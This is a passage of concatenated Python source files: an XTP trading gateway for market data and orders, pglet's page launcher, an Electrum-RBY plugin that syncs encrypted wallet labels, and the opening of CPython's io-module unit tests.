"XTP") self.quote_api = XtpQuoteApi(self) self.trader_api = XtpTraderApi(self) set_async_callback_exception_handler( self._async_callback_exception_handler) def connect(self, setting: dict): """""" userid = setting['账号'] password = setting['密码'] client_id = int(setting['客户号']) quote_ip = setting['行情地址'] quote_port = int(setting['行情端口']) trader_ip = setting['交易地址'] trader_port = int(setting['交易端口']) quote_protocol = setting["行情协议"] software_key = setting["授权码"] self.quote_api.connect(userid, password, client_id, quote_ip, quote_port, quote_protocol) self.trader_api.connect(userid, password, client_id, trader_ip, trader_port, software_key) self.init_query() def close(self): """""" self.quote_api.close() self.trader_api.close() def subscribe(self, req: SubscribeRequest): """""" self.quote_api.subscrbie(req) def send_order(self, req: OrderRequest) -> str: """""" return self.trader_api.send_order(req) def cancel_order(self, req: CancelRequest): """""" self.trader_api.cancel_order(req) def query_account(self): """""" self.trader_api.query_account() def query_position(self): """""" self.trader_api.query_position() def process_timer_event(self, event): """""" self.count += 1 if self.count < 2: return self.count = 0 func = self.query_functions.pop(0) func() self.query_functions.append(func) def init_query(self): """""" self.count = 0 self.query_functions = [self.query_account, self.query_position] self.event_engine.register(EVENT_TIMER, self.process_timer_event) def _async_callback_exception_handler(self, e: AsyncDispatchException): error_str = f"发生内部错误:\n" f"位置:{e.instance}.{e.function_name}" f"详细信息:{e.what}" print(error_str) class XtpQuoteApi(API.QuoteSpi): def __init__(self, gateway: BaseGateway): """""" super().__init__() self.gateway = gateway self.gateway_name = gateway.gateway_name self.userid = "" self.password = "" self.client_id: int = 0 self.server_ip = "" self.server_port: int = 0 self.server_protocol = "" self.api = None def connect( self, userid: str, password: str, client_id: int, server_ip: str, server_port: int, quote_protocol: str ): """""" if self.api: return self.userid = userid self.password = password self.client_id = client_id self.server_ip = server_ip self.server_port = server_port if quote_protocol == "CTP": self.quote_protocol = XTP_PROTOCOL_TYPE.XTP_PROTOCOL_TCP else: self.quote_protocol = XTP_PROTOCOL_TYPE.XTP_PROTOCOL_UDP # Create API object path = str(get_folder_path(self.gateway_name.lower())) self.api = API.QuoteApi.CreateQuoteApi( self.client_id, path, XTP_LOG_LEVEL.XTP_LOG_LEVEL_TRACE ) self.api.RegisterSpi(self) self.gateway.write_log("行情接口初始化成功") # Login to server Thread(target=self.login).start() def login(self): """""" ret = self.api.Login( self.server_ip, self.server_port, self.userid, self.password, self.quote_protocol ) if not ret: msg = "行情服务器登录成功" self.query_contract() else: msg = f"行情服务器登录失败,原因:{ret}" self.gateway.write_log(msg) def close(self): """""" if self.api: self.api.RegisterSpi(None) self.api.Release() def subscrbie(self, req: SubscribeRequest): """""" xtp_exchange = EXCHANGE_VT2XTP.get(req.exchange, "") self.api.SubscribeMarketData([req.symbol], xtp_exchange) def query_contract(self): """""" for exchange_id in EXCHANGE_XTP2VT.keys(): self.api.QueryAllTickers(exchange_id) def check_error(self, func_name: str, error_info: XTPRspInfoStruct): """""" if error_info and error_info.error_id: msg = f"{func_name}发生错误, 代码:{error_info.error_id},信息:{error_info.error_msg}" self.gateway.write_log(msg) return True else: return False def OnDisconnected(self, reason: int) -> Any: """""" self.gateway.write_log("行情服务器连接断开") self.login() def OnError(self, error_info: XTPRspInfoStruct) -> Any: """""" self.check_error("行情接口", error_info) def OnSubMarketData(self, ticker: XTPSpecificTickerStruct, error_info: XTPRspInfoStruct, is_last: bool) -> Any: """""" self.check_error("订阅行情", error_info) def OnUnSubMarketData(self, ticker: XTPSpecificTickerStruct, error_info: XTPRspInfoStruct, is_last: bool) -> Any: """""" pass def OnDepthMarketData(self, market_data: XTPMarketDataStruct, bid1_qty: Sequence[int], bid1_count: int, max_bid1_count: int, ask1_qty: Sequence[int], ask1_count: int, max_ask1_count: int) -> Any: """""" timestamp = str(market_data.data_time) dt = datetime.strptime(timestamp, "%Y%m%d%H%M%S%f") tick = TickData( symbol=market_data.ticker, exchange=EXCHANGE_XTP2VT[market_data.exchange_id], datetime=dt, volume=market_data.qty, last_price=market_data.last_price, limit_up=market_data.upper_limit_price, limit_down=market_data.lower_limit_price, open_price=market_data.open_price, high_price=market_data.high_price, low_price=market_data.low_price, pre_close=market_data.pre_close_price, bid_price_1=market_data.bid[0], bid_price_2=market_data.bid[1], bid_price_3=market_data.bid[2], bid_price_4=market_data.bid[3], bid_price_5=market_data.bid[4], ask_price_1=market_data.ask[0], ask_price_2=market_data.ask[1], ask_price_3=market_data.ask[2], ask_price_4=market_data.ask[3], ask_price_5=market_data.ask[4], bid_volume_1=market_data.bid_qty[0], bid_volume_2=market_data.bid_qty[1], bid_volume_3=market_data.bid_qty[2], bid_volume_4=market_data.bid_qty[3], bid_volume_5=market_data.bid_qty[4], ask_volume_1=market_data.ask_qty[0], ask_volume_2=market_data.ask_qty[1], ask_volume_3=market_data.ask_qty[2], ask_volume_4=market_data.ask_qty[3], ask_volume_5=market_data.ask_qty[4], gateway_name=self.gateway_name ) tick.name = symbol_name_map.get(tick.vt_symbol, tick.symbol) self.gateway.on_tick(tick) def OnSubOrderBook(self, ticker: XTPSpecificTickerStruct, error_info: XTPRspInfoStruct, is_last: bool) -> Any: """""" pass def OnUnSubOrderBook(self, ticker: XTPSpecificTickerStruct, error_info: XTPRspInfoStruct, is_last: bool) -> Any: """""" pass def OnOrderBook(self, order_book: OrderBookStruct) -> Any: """""" pass def OnSubTickByTick(self, ticker: XTPSpecificTickerStruct, error_info: XTPRspInfoStruct, is_last: bool) -> Any: """""" pass def OnUnSubTickByTick(self, ticker: XTPSpecificTickerStruct, error_info: XTPRspInfoStruct, is_last: bool) -> Any: """""" pass def OnTickByTick(self, tbt_data: XTPTickByTickStruct) -> Any: """""" pass def OnSubscribeAllMarketData(self, exchange_id: XTP_EXCHANGE_TYPE, error_info: XTPRspInfoStruct) -> Any: """""" pass def OnUnSubscribeAllMarketData(self, exchange_id: XTP_EXCHANGE_TYPE, error_info: XTPRspInfoStruct) -> Any: """""" pass def OnSubscribeAllOrderBook(self, exchange_id: XTP_EXCHANGE_TYPE, error_info: XTPRspInfoStruct) -> Any: """""" pass def OnUnSubscribeAllOrderBook(self, exchange_id: XTP_EXCHANGE_TYPE, error_info: XTPRspInfoStruct) -> Any: """""" pass def OnSubscribeAllTickByTick(self, exchange_id: XTP_EXCHANGE_TYPE, error_info: XTPRspInfoStruct) -> Any: """""" pass def OnUnSubscribeAllTickByTick(self, exchange_id: XTP_EXCHANGE_TYPE, error_info: XTPRspInfoStruct) -> Any: """""" pass def OnQueryAllTickers(self, ticker_info: XTPQuoteStaticInfo, error_info: XTPRspInfoStruct, is_last: bool) -> Any: """""" if self.check_error("查询合约", error_info): return contract = ContractData( symbol=ticker_info.ticker, exchange=EXCHANGE_XTP2VT[ticker_info.exchange_id], name=ticker_info.ticker_name, product=PRODUCT_XTP2VT[ticker_info.ticker_type], size=1, pricetick=ticker_info.price_tick, min_volume=ticker_info.buy_qty_unit, gateway_name=self.gateway_name ) self.gateway.on_contract(contract) symbol_name_map[contract.vt_symbol] = contract.name if contract.product != Product.INDEX: symbol_exchange_map[contract.symbol] = contract.exchange if is_last: self.gateway.write_log(f"{contract.exchange.value}合约信息查询成功") def OnQueryTickersPriceInfo(self, ticker_info: XTPTickerPriceInfo, error_info: XTPRspInfoStruct, is_last: bool) -> Any: """""" pass def OnSubscribeAllOptionMarketData(self, exchange_id: XTP_EXCHANGE_TYPE, error_info: XTPRspInfoStruct) -> Any: """""" pass def OnUnSubscribeAllOptionMarketData(self, exchange_id: XTP_EXCHANGE_TYPE, error_info: XTPRspInfoStruct) -> Any: """""" pass def OnSubscribeAllOptionOrderBook(self, exchange_id: XTP_EXCHANGE_TYPE, error_info: XTPRspInfoStruct) -> Any: """""" pass def OnUnSubscribeAllOptionOrderBook(self, exchange_id: XTP_EXCHANGE_TYPE, error_info: XTPRspInfoStruct) -> Any: """""" pass def OnSubscribeAllOptionTickByTick(self, exchange_id: XTP_EXCHANGE_TYPE, error_info: XTPRspInfoStruct) -> Any: """""" pass def OnUnSubscribeAllOptionTickByTick(self, exchange_id: XTP_EXCHANGE_TYPE, error_info: XTPRspInfoStruct) -> Any: """""" pass class XtpTraderApi(API.TraderSpi): def __init__(self, gateway: BaseGateway): """""" super().__init__() self.gateway = gateway self.gateway_name = gateway.gateway_name self.userid = "" self.password = "" self.client_id = "" self.server_ip = "" self.server_port = "" self.software_key = "" self.api = None self.session_id = 0 self.reqid = 0 # Whether current account supports margin or option self.margin_trading = False self.option_trading = False # self.short_positions = {} def connect( self, userid: str, password: str, client_id: int, server_ip: str, server_port: int, software_key: str ): """""" if self.api: return self.userid = userid self.password = password self.client_id = client_id self.server_ip = server_ip self.server_port = server_port self.software_key = software_key # Create API object path = str(get_folder_path(self.gateway_name.lower())) self.api = API.TraderApi.CreateTraderApi( self.client_id, path, XTP_LOG_LEVEL.XTP_LOG_LEVEL_TRACE ) self.api.RegisterSpi(self) self.api.SetSoftwareKey(self.software_key) self.api.SubscribePublicTopic(XTP_TE_RESUME_TYPE.XTP_TERT_RESTART) self.gateway.write_log("交易接口初始化成功") # Login to server Thread(target=self.login).start() def login(self): """""" self.session_id = self.api.Login( self.server_ip, self.server_port, self.userid, self.password, XTP_PROTOCOL_TYPE.XTP_PROTOCOL_TCP ) if self.session_id: msg = "交易服务器登录成功" else: error = self.api.GetApiLastError() msg = f"交易服务器登录失败,原因:{error.error_msg}" self.gateway.write_log(msg) def close(self): """""" if self.api: self.api.RegisterSpi(None) self.api.Release() def send_order(self, req: OrderRequest) -> str: """""" if req.exchange not in MARKET_VT2XTP: self.gateway.write_log(f"委托失败,不支持的交易所{req.exchange.value}") return "" if req.type not in ORDERTYPE_VT2XTP: self.gateway.write_log(f"委托失败,不支持的委托类型{req.type.value}") return "" xtp_req = XTPOrderInsertInfo() xtp_req.ticker = req.symbol xtp_req.market = MARKET_VT2XTP[req.exchange] xtp_req.price = req.price xtp_req.quantity = int(req.volume) xtp_req.side = DIRECTION_VT2XTP.get((req.direction, req.offset), "") xtp_req.price_type = ORDERTYPE_VT2XTP[req.type] if req.offset == Offset.NONE: xtp_req.business_type = XTP_BUSINESS_TYPE.XTP_BUSINESS_TYPE_CASH else: xtp_req.business_type = XTP_BUSINESS_TYPE.XTP_BUSINESS_TYPE_MARGIN orderid = self.api.InsertOrder(xtp_req, self.session_id) order = req.create_order_data(str(orderid), self.gateway_name) self.gateway.on_order(order) return order.vt_orderid def cancel_order(self, req: CancelRequest): """""" self.api.CancelOrder(int(req.orderid), self.session_id) def query_account(self): """""" if not self.api: return self.reqid += 1 self.api.QueryAsset(self.session_id, self.reqid) def query_position(self): """""" if not self.api: return self.reqid += 1 self.api.QueryPosition("", self.session_id, self.reqid) if self.margin_trading: self.reqid += 1 self.api.QueryCreditDebtInfo(self.session_id, self.reqid) def check_error(self, func_name: str, error_info: XTPRspInfoStruct): """""" if error_info and error_info.error_id: msg = f"{func_name}发生错误, 代码:{error_info.error_id},信息:{error_info.error_msg}" self.gateway.write_log(msg) return True else: return False def OnDisconnected(self, session_id: int, reason: int) -> Any: """""" self.gateway.write_log("交易服务器连接断开") self.login() def OnError(self, error_info: XTPRspInfoStruct) -> Any: """""" self.check_error("交易接口", error_info) def OnOrderEvent(self, order_info: XTPOrderInfo, error_info: XTPRspInfoStruct, session_id: int) -> Any: """""" self.check_error("委托下单", error_info) direction, offset = DIRECTION_XTP2VT[order_info.side] order = OrderData( symbol=order_info.ticker, exchange=MARKET_XTP2VT[order_info.market], orderid=str(order_info.order_xtp_id), type=ORDERTYPE_XTP2VT[order_info.price_type], direction=direction, offset=offset, price=order_info.price, volume=order_info.quantity, traded=order_info.qty_traded, status=STATUS_XTP2VT[order_info.order_status], time=order_info.insert_time, gateway_name=self.gateway_name ) self.gateway.on_order(order) def OnTradeEvent(self, trade_info: XTPTradeReport, session_id: int) -> Any: """""" direction, offset = DIRECTION_XTP2VT[trade_info.side] trade = TradeData( symbol=trade_info.ticker, exchange=MARKET_XTP2VT[trade_info.market], orderid=str(trade_info.order_xtp_id), tradeid=str(trade_info.exec_id), direction=direction, offset=offset, price=trade_info.price, volume=trade_info.quantity, time=trade_info.trade_time, gateway_name=self.gateway_name ) self.gateway.on_trade(trade) def OnCancelOrderError(self, cancel_info: XTPOrderCancelInfo, error_info: XTPRspInfoStruct, session_id: int) -> Any: """""" self.check_error("委托撤单", error_info) def OnQueryOrder(self, order_info: XTPOrderInfo, error_info: XTPRspInfoStruct, is_last: bool, session_id: int) -> Any: """""" if self.check_error("查询委托", error_info): return self.updateOrder(order_info) if is_last: self.gateway.write_log("查询委托信息成功") def OnQueryTrade(self, trade_info: XTPTradeReport, error_info: XTPRspInfoStruct, is_last: bool, session_id: int) -> Any: """""" if self.check_error("查询成交", error_info): return self.updateTrade(trade_info) if is_last: self.gateway.write_log("查询成交信息成功") def OnQueryPosition(self, xtp_position: XTPQueryStkPositionRsp, error_info: XTPRspInfoStruct, request_id: int, is_last: bool, session_id: int) -> Any: """""" position = PositionData( symbol=xtp_position.ticker, exchange=MARKET_XTP2VT[xtp_position.market], direction=Direction.LONG, volume=xtp_position.total_qty, frozen=xtp_position.locked_position, price=xtp_position.avg_price, pnl=xtp_position.unrealized_pnl, yd_volume=xtp_position.yesterday_position, gateway_name=self.gateway_name ) self.gateway.on_position(position) def OnQueryAsset(self, asset: XTPQueryAssetRsp, error_info: XTPRspInfoStruct, request_id: int, is_last: bool, session_id: int) -> Any: """""" account = AccountData( accountid=self.userid, balance=asset.buying_power, frozen=asset.withholding_amount, gateway_name=self.gateway_name ) self.gateway.on_account(account) if asset.account_type == XTP_ACCOUNT_TYPE.XTP_ACCOUNT_CREDIT: self.margin_trading = True elif asset.account_type == XTP_ACCOUNT_TYPE.XTP_ACCOUNT_DERIVE: self.option_trading = True def OnQueryStructuredFund(self, fund_info: XTPStructuredFundInfo, error_info: XTPRspInfoStruct, is_last: bool, session_id: int) -> Any: """""" pass def OnQueryFundTransfer(self, fund_transfer_info: XTPFundTransferNotice, error_info: XTPRspInfoStruct, is_last: bool, session_id: int) -> Any: """""" pass def OnFundTransfer(self, fund_transfer_info: XTPFundTransferNotice, session_id: int) -> Any: """""" pass def OnQueryETF(self, etf_info: XTPQueryETFBaseRsp, error_info: XTPRspInfoStruct, is_last: bool, session_id: int) -> Any: """""" pass def OnQueryETFBasket(self, etf_component_info: XTPQueryETFComponentRsp, error_info: XTPRspInfoStruct, is_last: bool, session_id: int) -> Any: """""" pass def OnQueryIPOInfoList(self, ipo_info: XTPQueryIPOTickerRsp, error_info: XTPRspInfoStruct, is_last: bool, session_id: int) -> Any: """""" pass def OnQueryIPOQuotaInfo(self, quota_info: XTPQueryIPOQuotaRsp, error_info: XTPRspInfoStruct, is_last: bool, session_id: int) -> Any: """""" pass def OnQueryOptionAuctionInfo(self, option_info: XTPQueryOptionAuctionInfoRsp, error_info: XTPRspInfoStruct, is_last: bool, session_id: int) -> Any: """""" pass def OnQueryCreditDebtInfo(self, debt_info: XTPCrdDebtInfo, error_info: XTPRspInfoStruct, request_id: int, is_last: bool, session_id: int) -> Any: """""" if debt_info.debt_type == 1: symbol = debt_info.ticker exchange = MARKET_XTP2VT[debt_info.market] position = self.short_positions.get(symbol, None) if not position: position = PositionData( symbol=symbol, exchange=exchange, direction=Direction.SHORT, gateway_name=self.gateway_name ) self.short_positions[symbol] = position position.volume += debt_info.remain_qty if is_last: for position in self.short_positions.values(): self.gateway.on_position(position) self.short_positions.clear()
pglet.py
import os import platform import subprocess import re import signal from threading import Thread from time import sleep from .utils import is_windows, which, encode_attr from .connection import Connection from .page import Page pglet_exe = "" def page(name=None, local=False, server=None, token=None, permissions=None, no_window=False): pargs = [pglet_exe, "page"] if name != None: pargs.append(name) if local: pargs.append("--local") if server != None: pargs.append("--server") pargs.append(server) if token != None: pargs.append("--token") pargs.append(token) if permissions != None: pargs.append("--permissions") pargs.append(permissions) if no_window: pargs.append("--no-window") pargs.append("--all-events") # execute pglet.exe and get connection ID exe_result = subprocess.check_output(pargs).decode("utf-8").strip() result_parts = re.split(r"\s", exe_result, 1) url = result_parts[1] print(url) conn = Connection(result_parts[0]) return Page(conn, url) def app(name=None, local=False, server=None, token=None, target=None, permissions=None, no_window=False): if target == None: raise Exception("target argument is not specified") pargs = [pglet_exe, "app"] if name != None: pargs.append(name) if local: pargs.append("--local") if server != None: pargs.append("--server") pargs.append(server) if token != None: pargs.append("--token") pargs.append(token) if permissions != None: pargs.append("--permissions") pargs.append(permissions) if no_window: pargs.append("--no-window") pargs.append("--all-events") def session_wrapper(target, page): try: target(page) except Exception as e: print(f"Unhandled error processing page session {page.connection.conn_id}:", e) page.error(f"There was an error while processing your request: {e}") # execute pglet.exe and get connection ID page_url = "" proc = subprocess.Popen(pargs, bufsize=0, stdout = subprocess.PIPE) for bline in proc.stdout: line = bline.decode('utf-8').rstrip() if page_url == "": # 1st is URL page_url = line print(page_url) else: # connection ID conn_id = line # create connection object conn = Connection(conn_id) page = Page(conn, page_url) # start page session in a new thread thread = Thread(target = session_wrapper, args = (target, page,)) thread.start() def init(): global pglet_exe if is_windows(): pglet_exe = "pglet.exe" else: pglet_exe = "pglet" # check if pglet.exe is in PATH already (development mode) pglet_in_path = which(pglet_exe) if pglet_in_path: pglet_exe = pglet_in_path return bin_dir = os.path.join(os.path.dirname(__file__), "bin") p = platform.system() if is_windows(): plat = "windows" elif p == "Linux": plat = "linux" elif p == "Darwin": plat = "darwin" else: raise Exception(f"Unsupported platform: {p}") a = platform.machine().lower() if a == "x86_64" or a == "amd64": arch = "amd64" elif a == "arm64" or a == "aarch64": arch = "arm64" elif a.startswith("arm"): arch = "arm" else: raise Exception(f"Unsupported architecture: {a}") pglet_exe = os.path.join(bin_dir, f"{plat}-{arch}", pglet_exe) # init Pglet during import init() # Fix: https://bugs.python.org/issue35935 signal.signal(signal.SIGINT, signal.SIG_DFL)
labels.py
import hashlib import requests import threading import json import sys import traceback import base64 import electrum_rby as electrum from electrum_rby.plugins import BasePlugin, hook from electrum_rby.i18n import _ class LabelsPlugin(BasePlugin): def __init__(self, parent, config, name): BasePlugin.__init__(self, parent, config, name) self.target_host = 'labels.bauerj.eu' self.wallets = {} def encode(self, wallet, msg): password, iv, wallet_id = self.wallets[wallet] encrypted = electrum.bitcoin.aes_encrypt_with_iv(password, iv, msg.encode('utf8')) return base64.b64encode(encrypted).decode() def decode(self, wallet, message): password, iv, wallet_id = self.wallets[wallet] decoded = base64.b64decode(message) decrypted = electrum.bitcoin.aes_decrypt_with_iv(password, iv, decoded) return decrypted.decode('utf8') def get_nonce(self, wallet): # nonce is the nonce to be used with the next change nonce = wallet.storage.get('wallet_nonce') if nonce is None: nonce = 1 self.set_nonce(wallet, nonce) return nonce def set_nonce(self, wallet, nonce): self.print_error("set", wallet.basename(), "nonce to", nonce) wallet.storage.put("wallet_nonce", nonce) @hook def set_label(self, wallet, item, label): if not wallet in self.wallets: return if not item: return nonce = self.get_nonce(wallet) wallet_id = self.wallets[wallet][2] bundle = {"walletId": wallet_id, "walletNonce": nonce, "externalId": self.encode(wallet, item), "encryptedLabel": self.encode(wallet, label)} t = threading.Thread(target=self.do_request, args=["POST", "/label", False, bundle]) t.setDaemon(True) t.start() # Caller will write the wallet self.set_nonce(wallet, nonce + 1) def do_request(self, method, url = "/labels", is_batch=False, data=None): url = 'https://' + self.target_host + url kwargs = {'headers': {}} if method == 'GET' and data: kwargs['params'] = data elif method == 'POST' and data: kwargs['data'] = json.dumps(data) kwargs['headers']['Content-Type'] = 'application/json' response = requests.request(method, url, **kwargs) if response.status_code != 200: raise BaseException(response.status_code, response.text) response = response.json() if "error" in response: raise BaseException(response["error"]) return response def push_thread(self, wallet): wallet_id = self.wallets[wallet][2] bundle = {"labels": [], "walletId": wallet_id, "walletNonce": self.get_nonce(wallet)} for key, value in wallet.labels.items(): try: encoded_key = self.encode(wallet, key) encoded_value = self.encode(wallet, value) except: self.print_error('cannot encode', repr(key), repr(value)) continue bundle["labels"].append({'encryptedLabel': encoded_value, 'externalId': encoded_key}) self.do_request("POST", "/labels", True, bundle) def pull_thread(self, wallet, force): wallet_id = self.wallets[wallet][2] nonce = 1 if force else self.get_nonce(wallet) - 1 self.print_error("asking for labels since nonce", nonce) try: response = self.do_request("GET", ("/labels/since/%d/for/%s" % (nonce, wallet_id) )) if response["labels"] is None: self.print_error('no new labels') return result = {} for label in response["labels"]: try: key = self.decode(wallet, label["externalId"]) value = self.decode(wallet, label["encryptedLabel"]) except: continue try: json.dumps(key) json.dumps(value) except: self.print_error('error: no json', key) continue result[key] = value for key, value in result.items(): if force or not wallet.labels.get(key): wallet.labels[key] = value self.print_error("received %d labels" % len(response)) # do not write to disk because we're in a daemon thread wallet.storage.put('labels', wallet.labels) self.set_nonce(wallet, response["nonce"] + 1) self.on_pulled(wallet) except Exception as e: traceback.print_exc(file=sys.stderr) self.print_error("could not retrieve labels") def start_wallet(self, wallet): nonce = self.get_nonce(wallet) self.print_error("wallet", wallet.basename(), "nonce is", nonce) mpk = wallet.get_fingerprint() if not mpk: return mpk = mpk.encode('ascii') password = hashlib.sha1(mpk).hexdigest()[:32].encode('ascii') iv = hashlib.sha256(password).digest()[:16] wallet_id = hashlib.sha256(mpk).hexdigest() self.wallets[wallet] = (password, iv, wallet_id) # If there is an auth token we can try to actually start syncing t = threading.Thread(target=self.pull_thread, args=(wallet, False)) t.setDaemon(True) t.start() def stop_wallet(self, wallet): self.wallets.pop(wallet, None)
test_io.py
"""Unit tests for the io module.""" # Tests of io are scattered over the test suite: # * test_bufio - tests file buffering # * test_memoryio - tests BytesIO and StringIO # * test_fileio - tests FileIO # * test_file - tests the file interface # * test_io - tests everything else in the io module # * test_univnewlines - tests universal newline support # * test_largefile - tests operations on a file greater than 2**32 bytes # (only enabled with -ulargefile) ################################################################################ # ATTENTION TEST WRITERS!!! ################################################################################ # When writing tests for io, it's important to test both the C and Python # implementations. This is usually done by writing a base test that refers to # the type it is testing as an attribute. Then it provides custom subclasses to # test both implementations. This file has lots of examples. ################################################################################ import abc import array import errno import locale import os import pickle import random import signal import sys import sysconfig import textwrap import threading import time import unittest import warnings import weakref from collections import deque, UserList from itertools import cycle, count from test import support from test.support.script_helper import ( assert_python_ok, assert_python_failure, run_python_until_end) from test.support import threading_helper from test.support import FakePath import codecs import io # C implementation of io import _pyio as pyio # Python implementation of io try: import ctypes except ImportError: def byteslike(*pos, **kw): return array.array("b", bytes(*pos, **kw)) else: def byteslike(*pos, **kw): """Create a bytes-like object having no string or sequence methods""" data = bytes(*pos, **kw) obj = EmptyStruct() ctypes.resize(obj, len(data)) memoryview(obj).cast("B")[:] = data return obj class EmptyStruct(ctypes.Structure): pass _cflags = sysconfig.get_config_var('CFLAGS') or '' _config_args = sysconfig.get_config_var('CONFIG_ARGS') or '' MEMORY_SANITIZER = ( '-fsanitize=memory' in _cflags or '--with-memory-sanitizer' in _config_args ) # Does io.IOBase finalizer log the exception if the close() method fails? # The exception is ignored silently by default in release build. IOBASE_EMITS_UNRAISABLE = (hasattr(sys, "gettotalrefcount") or sys.flags.dev_mode) def _default_chunk_size(): """Get the default TextIOWrapper chunk size""" with open(__file__, "r", encoding="latin-1") as f: return f._CHUNK_SIZE class MockRawIOWithoutRead: """A RawIO implementation without read(), so as to exercise the default RawIO.read() which calls readinto().""" def __init__(self, read_stack=()): self._read_stack = list(read_stack) self._write_stack = [] self._reads = 0 self._extraneous_reads = 0 def write(self, b): self._write_stack.append(bytes(b)) return len(b) def writable(self): return True def fileno(self): return 42 def readable(self): return True def seekable(self): return True def seek(self, pos, whence): return 0 # wrong but we gotta return something def tell(self): return 0 # same comment as above def readinto(self, buf): self._reads += 1 max_len = len(buf) try: data = self._read_stack[0] except IndexError: self._extraneous_reads += 1 return 0 if data is None: del self._read_stack[0] return None n = len(data) if len(data) <= max_len: del self._read_stack[0] buf[:n] = data return n else: buf[:] = data[:max_len] self._read_stack[0] = data[max_len:] return max_len def truncate(self, pos=None): return pos class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase): pass class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase): pass class MockRawIO(MockRawIOWithoutRead): def read(self, n=None): self._reads += 1 try: return self._read_stack.pop(0) except: self._extraneous_reads += 1 return b"" class CMockRawIO(MockRawIO, io.RawIOBase): pass class PyMockRawIO(MockRawIO, pyio.RawIOBase): pass class MisbehavedRawIO(MockRawIO): def write(self, b): return super().write(b) * 2 def read(self, n=None): return super().read(n) * 2 def seek(self, pos, whence): return -123 def tell(self): return -456 def readinto(self, buf): super().readinto(buf) return len(buf) * 5 class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase): pass class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase): pass class SlowFlushRawIO(MockRawIO): def __init__(self): super().__init__() self.in_flush = threading.Event() def flush(self): self.in_flush.set() time.sleep(0.25) class CSlowFlushRawIO(SlowFlushRawIO, io.RawIOBase): pass class PySlowFlushRawIO(SlowFlushRawIO, pyio.RawIOBase): pass class CloseFailureIO(MockRawIO): closed = 0 def close(self): if not self.closed: self.closed = 1 raise OSError class CCloseFailureIO(CloseFailureIO, io.RawIOBase): pass class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase): pass class MockFileIO: def __init__(self, data): self.read_history = [] super().__init__(data) def read(self, n=None): res = super().read(n) self.read_history.append(None if res is None else len(res)) return res def readinto(self, b): res = super().readinto(b) self.read_history.append(res) return res class CMockFileIO(MockFileIO, io.BytesIO): pass class PyMockFileIO(MockFileIO, pyio.BytesIO): pass class MockUnseekableIO: def seekable(self): return False def seek(self, *args): raise self.UnsupportedOperation("not seekable") def tell(self, *args): raise self.UnsupportedOperation("not seekable") def truncate(self, *args): raise self.UnsupportedOperation("not seekable") class CMockUnseekableIO(MockUnseekableIO, io.BytesIO): UnsupportedOperation = io.UnsupportedOperation class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO): UnsupportedOperation = pyio.UnsupportedOperation class MockNonBlockWriterIO: def __init__(self): self._write_stack = [] self._blocker_char = None def pop_written(self): s = b"".join(self._write_stack) self._write_stack[:] = [] return s def block_on(self, char): """Block when a given char is encountered.""" self._blocker_char = char def readable(self): return True def seekable(self): return True def seek(self, pos, whence=0): # naive implementation, enough for tests return 0 def writable(self): return True def write(self, b): b = bytes(b) n = -1 if self._blocker_char: try: n = b.index(self._blocker_char) except ValueError: pass else: if n > 0: # write data up to the first blocker self._write_stack.append(b[:n]) return n else: # cancel blocker and indicate would block self._blocker_char = None return None self._write_stack.append(b) return len(b) class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase): BlockingIOError = io.BlockingIOError class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase): BlockingIOError = pyio.BlockingIOError class IOTest(unittest.TestCase): def setUp(self): support.unlink(support.TESTFN) def tearDown(self): support.unlink(support.TESTFN) def write_ops(self, f): self.assertEqual(f.write(b"blah."), 5) f.truncate(0) self.assertEqual(f.tell(), 5) f.seek(0) self.assertEqual(f.write(b"blah."), 5) self.assertEqual(f.seek(0), 0) self.assertEqual(f.write(b"Hello."), 6) self.assertEqual(f.tell(), 6) self.assertEqual(f.seek(-1, 1), 5) self.assertEqual(f.tell(), 5) buffer = bytearray(b" world\n\n\n") self.assertEqual(f.write(buffer), 9) buffer[:] = b"*" * 9 # Overwrite our copy of the data self.assertEqual(f.seek(0), 0) self.assertEqual(f.write(b"h"), 1) self.assertEqual(f.seek(-1, 2), 13) self.assertEqual(f.tell(), 13) self.assertEqual(f.truncate(12), 12) self.assertEqual(f.tell(), 13) self.assertRaises(TypeError, f.seek, 0.0) def read_ops(self, f, buffered=False): data = f.read(5) self.assertEqual(data, b"hello") data = byteslike(data) self.assertEqual(f.readinto(data), 5) self.assertEqual(bytes(data), b" worl") data = bytearray(5) self.assertEqual(f.readinto(data), 2) self.assertEqual(len(data), 5) self.assertEqual(data[:2], b"d\n") self.assertEqual(f.seek(0), 0) self.assertEqual(f.read(20), b"hello world\n") self.assertEqual(f.read(1), b"") self.assertEqual(f.readinto(byteslike(b"x")), 0) self.assertEqual(f.seek(-6, 2), 6) self.assertEqual(f.read(5), b"world") self.assertEqual(f.read(0), b"") self.assertEqual(f.readinto(byteslike()), 0) self.assertEqual(f.seek(-6, 1), 5) self.assertEqual(f.read(5), b" worl") self.assertEqual(f.tell(), 10) self.assertRaises(TypeError, f.seek, 0.0) if buffered: f.seek(0) self.assertEqual(f.read(), b"hello world\n") f.seek(6) self.assertEqual(f.read(), b"world\n") self.assertEqual(f.read(), b"") f.seek(0) data = byteslike(5) self.assertEqual(f.readinto1(data), 5) self.assertEqual(bytes(data), b"hello") LARGE = 2**31 def large_file_ops(self, f): assert f.readable() assert f.writable() try: self.assertEqual(f.seek(self.LARGE), self.LARGE) except (OverflowError, ValueError): self.skipTest("no largefile support") self.assertEqual(f.tell(), self.LARGE) self.assertEqual(f.write(b"xxx"), 3) self.assertEqual(f.tell(), self.LARGE + 3) self.assertEqual(f.seek(-1, 1), self.LARGE + 2) self.assertEqual(f.truncate(), self.LARGE + 2) self.assertEqual(f.tell(), self.LARGE + 2) self.assertEqual(f.seek(0, 2), self.LARGE + 2) self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1) self.assertEqual(f.tell(), self.LARGE + 2) self.assertEqual(f.seek(0, 2), self.LARGE + 1) self.assertEqual(f.seek(-1, 2), self.LARGE) self.assertEqual(f.read(2), b"x") def test_invalid_operations(self): # Try writing on a file opened in read mode and vice-versa. exc = self.UnsupportedOperation for mode in ("w", "wb"): with self.open(support.TESTFN, mode) as fp: self.assertRaises(exc, fp.read) self.assertRaises(exc, fp.readline) with self.open(support.TESTFN, "wb", buffering=0) as fp: 